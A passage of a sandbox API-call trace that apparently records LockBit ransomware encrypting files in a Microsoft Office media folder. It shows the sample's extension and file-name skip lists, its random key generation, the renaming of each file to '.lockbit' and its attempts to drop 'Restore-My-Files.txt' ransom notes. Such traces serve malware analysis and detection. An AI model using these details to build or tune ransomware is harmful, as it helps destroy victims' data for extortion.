[0197.897] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297185.WMF") returned -1 [0197.897] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297185.WMF") returned 1 [0197.897] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297185.WMF") returned -1 [0197.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.897] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF") returned=".WMF" [0197.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.897] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.899] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.899] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF.lockbit") returned 70 [0197.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297185.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0197.900] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.900] malloc (_Size=0x40068) returned 0x1ff1e60 [0197.900] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=52562) returned 1 [0197.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0197.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0197.902] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.907] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.907] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.907] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.909] free (_Block=0x1fa2ed8) [0197.909] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.909] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.909] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74beac00, ftCreationTime.dwHighDateTime=0x1bf2c97, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x74beac00, ftLastWriteTime.dwHighDateTime=0x1bf2c97, nFileSizeHigh=0x0, nFileSizeLow=0x6db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297551.WMF", cAlternateFileName="")) returned 1 [0197.909] lstrcmpiW (lpString1=".", lpString2="J0297551.WMF") returned -1 [0197.909] lstrcmpiW (lpString1="..", lpString2="J0297551.WMF") returned -1 [0197.909] PathFindExtensionW (pszPath="J0297551.WMF") returned=".WMF" [0197.909] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.910] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.911] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.911] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297551.WMF") returned 1 [0197.912] lstrcmpiW (lpString1="ntldr", lpString2="J0297551.WMF") returned 1 [0197.912] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297551.WMF") returned 1 [0197.912] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297551.WMF") returned -1 [0197.912] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297551.WMF") returned -1 [0197.912] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297551.WMF") returned 1 [0197.912] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297551.WMF") returned -1 [0197.912] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.912] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF") returned=".WMF" [0197.912] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.912] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.912] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.913] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.913] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF.lockbit") returned 70 [0197.913] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297551.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0197.915] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.916] malloc (_Size=0x40068) returned 0x1ff1e60 [0197.916] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=28088) returned 1 [0197.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.916] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0197.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0197.917] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.927] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.927] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.066] free (_Block=0x1fa2ed8) [0199.066] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.066] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.066] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.066] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50170400, ftCreationTime.dwHighDateTime=0x1bf2c98, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x50170400, ftLastWriteTime.dwHighDateTime=0x1bf2c98, nFileSizeHigh=0x0, nFileSizeLow=0xa7c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297707.WMF", cAlternateFileName="")) returned 1 [0199.066] lstrcmpiW (lpString1=".", lpString2="J0297707.WMF") returned -1 [0199.066] lstrcmpiW (lpString1="..", lpString2="J0297707.WMF") returned -1 [0199.066] PathFindExtensionW (pszPath="J0297707.WMF") returned=".WMF" [0199.066] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.066] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.067] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.067] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297707.WMF") returned 1 [0199.067] lstrcmpiW (lpString1="ntldr", lpString2="J0297707.WMF") returned 1 [0199.067] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297707.WMF") returned 1 [0199.067] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297707.WMF") returned -1 [0199.067] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297707.WMF") returned -1 [0199.067] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297707.WMF") returned 1 [0199.067] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297707.WMF") returned -1 [0199.067] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.068] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF") returned=".WMF" [0199.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.068] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.068] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.068] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF.lockbit") returned 70 [0199.068] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297707.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.070] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.070] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.070] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=42946) returned 1 [0199.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.071] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.071] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.071] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.075] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.075] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.075] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.077] free (_Block=0x1fa2ed8) [0199.077] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.077] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.077] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x848ac000, ftCreationTime.dwHighDateTime=0x1bf2c98, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x848ac000, ftLastWriteTime.dwHighDateTime=0x1bf2c98, nFileSizeHigh=0x0, nFileSizeLow=0x27ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297749.WMF", 